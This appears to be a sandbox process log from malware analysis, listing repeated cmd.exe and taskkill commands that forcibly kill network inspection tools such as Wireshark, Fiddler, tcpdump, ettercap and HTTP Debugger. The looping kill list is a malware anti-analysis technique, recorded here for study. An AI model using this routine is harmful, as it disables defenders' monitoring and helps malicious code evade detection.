C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

